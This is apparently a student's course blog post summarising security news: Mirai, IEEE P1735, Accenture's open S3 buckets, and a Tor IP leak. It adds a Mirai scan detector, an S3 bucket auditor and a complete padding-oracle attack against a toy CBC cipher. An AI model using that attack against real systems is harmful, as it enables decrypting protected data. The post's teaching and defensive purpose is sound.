Week 10: Web Application Hacking

This article starts from the idea that schools should teach students how to stop malicious hackers by learning the hackers' ways. Imagine a world where security guards learn to be robbers first. The first step for students, before moving into a government or corporate job where they work to prevent hacks, is to learn the darker side of the trade: exploiting loopholes, thieving from servers, cracking passwords, and not just learning about these techniques but performing them, in a classroom set up especially for the experience. Students learn the tricks they need to break past a system's defenses, but not when to use which tricks. “Imagine getting the keys, not the locks” is the analogy the author used. I think this article, even though it is a few years old, relates to our program and what we are learning. The classes listed in this article have the same names as in our program.

It was discovered that OnePlus devices running OxygenOS shipped with a backdoor that allows anyone with local access to the phone (for example over ADB) to gain root access. The application left behind in the firmware is known as EngineerMode. A diagnostic testing application by Qualcomm, EngineerMode was made to test the hardware components of devices: it was designed to run diagnostics such as GPS checks, root-status checks, and various other hardware tests. Diagnostic tooling of this kind is meant for the factory and should be removed from production firmware before it ships.

ADT is a well known security company for your home or business. If someone breaks into your house or business, the system calls the police and alerts someone that a break-in has been attempted or has occurred. Now ADT is moving into the cyber security realm: it has added another part of its business, which will monitor the systems on your network to make sure that you are not being hacked. The CEO says, “his company wants to protect physical locations as well as the networks attached to them.”

In Germany, a 29-year-old man named by authorities only as “Daniel K.,” who was arrested on the 22nd of February, pleaded guilty in court on Friday to charges related to the hijacking of more than one million Deutsche Telekom routers.

According to reports in the German press, the man behind the attacks, which were powered by a variant of the notorious Mirai malware, pleaded guilty to “attempted computer sabotage.” The attack knocked more than 1.25 million customers of German telecommunications provider Deutsche Telekom offline last November.

According to the German authorities, the attack was especially severe. It was intended to compromise home routers and enrol them in a network of hijacked devices, popularly called a botnet, which was then offered for sale on dark web markets for launching DDoS attacks.

Late last year, Deutsche Telekom's routers were hit by a modified version of the Mirai malware, the infamous IoT malware that scans for insecure routers, cameras, DVRs and other IoT devices and enslaves them into a botnet. The variant probed the routers' remote-management port (TCP 7547, used by the TR-069/TR-064 protocols); the malformed requests crashed Deutsche Telekom's Speedport routers rather than infecting them, which is what took the customers offline. The company said at the time that the attack caused over a million pounds' worth of damage.
At the time of his arrest, the suspect faced up to 10 years in prison. He is due to be sentenced on July 28. Germany's Federal Criminal Police Office (the BKA) got involved in the investigation because the attack on Deutsche Telekom was deemed a threat to the nation's communication infrastructure.
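As an added example (not part of the article or of any Deutsche Telekom tooling), the following Python shows the kind of detection a network operator could run over firewall logs to catch Mirai-style scanning before it becomes an outage. Mirai's original scanner hammers TCP 23 and 2323 (telnet), and the variant aimed at Deutsche Telekom probed TCP 7547, the TR-069/TR-064 remote-management port. The log format, the addresses and the threshold are constructed assumptions.

```python
"""Flag Mirai-style scanners in firewall logs.

Added example, not from the article. Mirai's scanner hammers TCP 23 and 2323
(telnet); the variant aimed at Deutsche Telekom probed TCP 7547, the
TR-069/TR-064 remote-management port. One source touching many distinct
destinations on those ports is the signature. The log format, addresses and
threshold below are constructed assumptions.
"""
import re
from collections import defaultdict

SCAN_PORTS = {23, 2323, 7547}

# Constructed iptables-style log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
Nov 27 12:00:01 gw kernel: IN=eth0 SRC=203.0.113.5 DST=198.51.100.1 PROTO=TCP DPT=7547 SYN
Nov 27 12:00:01 gw kernel: IN=eth0 SRC=203.0.113.5 DST=198.51.100.2 PROTO=TCP DPT=7547 SYN
Nov 27 12:00:02 gw kernel: IN=eth0 SRC=203.0.113.5 DST=198.51.100.3 PROTO=TCP DPT=7547 SYN
Nov 27 12:00:02 gw kernel: IN=eth0 SRC=203.0.113.5 DST=198.51.100.4 PROTO=TCP DPT=7547 SYN
Nov 27 12:00:03 gw kernel: IN=eth0 SRC=192.0.2.77 DST=198.51.100.10 PROTO=TCP DPT=23 SYN
Nov 27 12:00:03 gw kernel: IN=eth0 SRC=192.0.2.77 DST=198.51.100.11 PROTO=TCP DPT=23 SYN
Nov 27 12:00:04 gw kernel: IN=eth0 SRC=192.0.2.77 DST=198.51.100.12 PROTO=TCP DPT=23 SYN
Nov 27 12:00:04 gw kernel: IN=eth0 SRC=192.0.2.77 DST=198.51.100.10 PROTO=TCP DPT=2323 SYN
Nov 27 12:00:05 gw kernel: IN=eth0 SRC=198.51.100.50 DST=198.51.100.1 PROTO=TCP DPT=443 SYN
Nov 27 12:00:05 gw kernel: IN=eth0 SRC=198.51.100.50 DST=198.51.100.1 PROTO=TCP DPT=7547 SYN
Nov 27 12:00:06 gw kernel: IN=eth0 SRC=198.51.100.60 DST=198.51.100.1 PROTO=TCP DPT=7547 SYN
Nov 27 12:00:06 gw kernel: IN=eth0 SRC=198.51.100.60 DST=198.51.100.2 PROTO=TCP DPT=7547 SYN
"""

LINE_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=TCP DPT=(\d+)")


def parse_connections(log_text):
    """Yield (src, dst, dport) for every TCP line the regex understands; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m.group(1), m.group(2), int(m.group(3))


def find_scanners(log_text, min_targets=3):
    """Return {src: {port: distinct_destinations}} for sources that hit at least
    `min_targets` distinct hosts on a Mirai scan port. Repeated probes of one host
    (e.g. an ISP's management server talking to a single router) do not count."""
    seen = defaultdict(lambda: defaultdict(set))
    for src, dst, dport in parse_connections(log_text):
        if dport in SCAN_PORTS:
            seen[src][dport].add(dst)
    flagged = {}
    for src, ports in seen.items():
        hits = {p: len(d) for p, d in ports.items() if len(d) >= min_targets}
        if hits:
            flagged[src] = hits
    return flagged


def alerts(log_text, min_targets=3):
    """Human-readable alert lines, one per (source, port) pair."""
    return [f"ALERT mirai-scan src={src} dport={port} distinct_targets={n}"
            for src, ports in find_scanners(log_text, min_targets).items()
            for port, n in sorted(ports.items())]


if __name__ == "__main__":
    for line in alerts(SAMPLE_LOG):
        print(line)
```

Counting distinct destinations rather than raw packets keeps a legitimate management server, which talks to one router repeatedly, out of the alert list. The matching preventive control is to drop inbound TCP 7547 from the internet at large and allow it only from the ISP's own management servers.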

Security researchers have found weaknesses “in the Institute of Electrical and Electronics Engineers (IEEE) P1735 cryptography standard that can be exploited to unlock, modify or steal encrypted system-on-chip blueprints.” IEEE P1735 was designed to encrypt electronic-design intellectual property (IP) in hardware and software design files so that it can be handed to tool vendors and integrators without exposing the source. Most mobile and embedded devices include a System-on-Chip (SoC), a circuit that consists of multiple IP blocks from different vendors, ranging from radio-frequency receivers to cryptographic engines.

An advisory published by the Department of Homeland Security's US-CERT confirms that IEEE P1735 is flawed; seven vulnerabilities were found. The most serious is a padding-oracle attack: the standard encrypts the IP with AES in CBC mode and provides no integrity check, so an electronic design automation (EDA) tool that reports whether decryption produced valid padding leaks enough for an attacker to recover the plaintext design block by block, without ever learning the key.
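The P1735 padding-oracle weakness is worth seeing in code. The block below is an added example, not the researchers' code or anything from the standard: it builds CBC mode with PKCS#7 padding over a toy Feistel block cipher (an assumption standing in for AES, since the attack never depends on the cipher itself), models the EDA tool as an oracle that only says whether the padding checked out, and recovers a constructed “design file” block by block without the key. The key, IV and plaintext are constructed.

```python
"""Padding-oracle attack on CBC mode without integrity protection.

Added example; not code from the article or from the P1735 researchers. A
compliant EDA tool decrypts design IP in AES-CBC with no integrity check and
reports padding errors, which makes the tool a padding oracle. The attack needs
only CBC, PKCS#7 padding and the oracle's yes/no answer, so the block cipher is
a toy 16-byte Feistel network (an assumption, NOT AES). Key, IV and plaintext
are constructed.
"""
import hashlib

BLOCK = 16
DEMO_KEY = b"constructed-demo-key"
DEMO_IV = bytes(range(16))
SAMPLE_IP = b"module secret_core(input clk, output q); // constructed design"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, half, rnd):
    # Keyed round function of the toy cipher: 8 bytes of SHA-256(key || round || half).
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def toy_encrypt_block(key, block):
    """8-round Feistel over a 16-byte block; invertible and keyed, stands in for AES."""
    left, right = block[:8], block[8:]
    for rnd in range(8):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right


def toy_decrypt_block(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(8)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(toy_decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out


def make_oracle(key):
    """Models the leaky tool: the caller learns only whether the padding was valid."""
    def oracle(iv, ct):
        try:
            unpad(cbc_decrypt(key, iv, ct))
            return True
        except ValueError:
            return False
    return oracle


def recover_block(oracle, prev, target):
    """Recover one plaintext block from its ciphertext `target` and the block before it."""
    inter = bytearray(BLOCK)                 # D_k(target), learned right to left
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos                 # padding length we force this round
        crafted = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):
            crafted[k] = inter[k] ^ padval    # known bytes are made to decrypt to padval
        for guess in range(256):
            crafted[pos] = guess
            if not oracle(bytes(crafted), target):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be a lucky 0x02 0x02 rather than 0x01:
                # disturb the byte before it and confirm the padding still validates.
                crafted[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(crafted), target)
                crafted[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("no guess accepted; not a padding oracle?")
    return _xor(inter, prev)


def recover_all(oracle, iv, ct):
    """Walk the whole ciphertext using the oracle alone; the key is never used."""
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                          for i in range(1, len(blocks))))


def demo():
    ct = cbc_encrypt(DEMO_KEY, DEMO_IV, pad(SAMPLE_IP))
    return recover_all(make_oracle(DEMO_KEY), DEMO_IV, ct)
```

Each recovered byte costs at most 256 oracle queries, so a whole design file falls in a few thousand. The protection the standard lacked is authenticated encryption (AES-GCM, or a MAC over the ciphertext verified before any decryption error can be reported); a real tool may also leak the same bit through a different error message or a timing difference rather than an explicit padding error.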

On the heels of Deloitte's security breach coming to light, another large company in the cyber security space reportedly suffers from lax cyber security itself. The article explains that Accenture left a large cache of sensitive information in cloud storage (Amazon S3 buckets) that was publicly accessible, without any password protection. It is believed that the information is now secure and that there was no incident, but I think it is probably too soon to be sure that it wasn't accessed by someone with malicious intent. As with Deloitte, it calls into question Accenture's credibility: they recommend cyber security best practices to their clients but fail to follow them themselves.
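Accenture's exposure was publicly readable Amazon S3 buckets, so the check a practitioner wants here is a review of bucket ACLs and bucket policies for grants to everyone. The Python below is an added example, not the article's or Accenture's code: it inspects the JSON that `aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` return (the latter hands the policy back as a JSON string under "Policy"). The bucket names, account number and sample documents are constructed.

```python
"""Spot S3 buckets that are open to the world.

Added example, not from the article. Accenture's exposure was publicly readable
Amazon S3 buckets; this is the check an operator would run over the JSON that
`aws s3api get-bucket-acl` and `aws s3api get-bucket-policy` return (the latter
hands the policy back as a JSON string under "Policy"). The bucket names and
documents below are constructed.
"""
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return (group URI, permission) for each ACL grant to a world-accessible group."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((grantee["URI"], grant["Permission"]))
    return hits


def _everyone(principal):
    # Principal may be the string "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def public_policy_statements(policy):
    """Return the Sid of every Allow statement any principal can use and that no
    Condition narrows. A Condition can still be too loose, so review hits by hand."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):      # a single statement may appear un-listed
        statements = [statements]
    return [s.get("Sid", "<no Sid>") for s in statements
            if s.get("Effect") == "Allow" and _everyone(s.get("Principal"))
            and not s.get("Condition")]


def audit_bucket(name, acl, policy=None):
    """Summarise one bucket; `public` is True if either path exposes it."""
    acl_hits = public_acl_grants(acl)
    policy_hits = public_policy_statements(policy) if policy else []
    return {"bucket": name, "acl_grants": acl_hits, "policy_statements": policy_hits,
            "public": bool(acl_hits or policy_hits)}


# Constructed sample documents: one exposed bucket, one locked down.
EXPOSED_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    ],
}
EXPOSED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicReadGetObject", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-keys-bucket/*"}],
})
HARDENED_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"}],
}
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "DeployRoleOnly", "Effect": "Allow",
                   "Principal": {"AWS": "arn:aws:iam::123456789012:role/deploy"},
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-keys-bucket/*"}],
})

if __name__ == "__main__":
    for name, acl, pol in (("example-keys-bucket", EXPOSED_ACL, EXPOSED_POLICY),
                           ("example-locked-bucket", HARDENED_ACL, HARDENED_POLICY)):
        print(audit_bucket(name, acl, pol))
```

Feed it the output of `aws s3api get-bucket-acl --bucket NAME` and `aws s3api get-bucket-policy --bucket NAME --query Policy --output text` for every bucket in the account. The hardened policy above grants the bucket to one IAM role only; turning on S3 Block Public Access at the account level is the setting that stops an `AllUsers` grant or a `Principal: "*"` statement from ever taking effect.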

I found this article interesting since it relates to a prior discussion the class had about an organization's data when it has an international site in China. Even though China is the world's second largest economy, digital communication there is becoming less free. The country's regulators are becoming more aggressive about what its more than 750 million internet users can and cannot do online. This year, the country has cracked down on the most popular video-streaming websites and on VPNs, removed foreign TV shows from online platforms, required users to register on online forums with their real names, and introduced laws that hold chat group admins accountable for what is said in their spaces. Additionally, the new laws require online news websites to be overseen by the government. Chinese internet users have expressed frustration with these changes. One student from the mainland relied on VPNs to connect to the outside world. Another stated they used VPNs to gain access to YouTube and other reference websites that helped them with their class work. I could not imagine the government controlling pretty much my every move on the internet. As the one student from China explained, she used a lot of outside sites to help with course work, as many people do around the world. China seems to be taking control to the next extreme, which, based on the feedback quoted, is hurting more than helping. I could never imagine not having access to Google at any point, a source the majority of people rely on to find websites and get questions answered.

This article describes how researchers found a critical vulnerability that could leak Tor users' real IP addresses to potential attackers while they use the Tor anonymity browser. Tor (The Onion Router) is free software for enabling anonymous communication; it started as a worldwide network of servers developed with the U.S. Navy that enabled people to browse the internet anonymously, and it is now run by a non-profit organization whose main purpose is the research and development of online privacy tools. According to the article, security researcher Filippo Cavallarin says the vulnerability resides in Firefox and therefore affects Tor Browser, since the privacy-aware browser uses Firefox at its core: the bug is in how Firefox handles file:// URLs, so a specially crafted link can make the operating system connect directly to a remote host, bypassing the Tor proxy and exposing the user's real IP address. The researcher also notes that the vulnerability only affects macOS and Linux users. Even so, he warns all Tor users to be aware of this vulnerability.

This article points to a good area where AI and machine learning can help the cyber security industry. Information is critical to an IT organization, especially during an incident. With unstructured data, meaning data that is not already in their SIEMs, it is a challenge for security teams to get ahead of threats.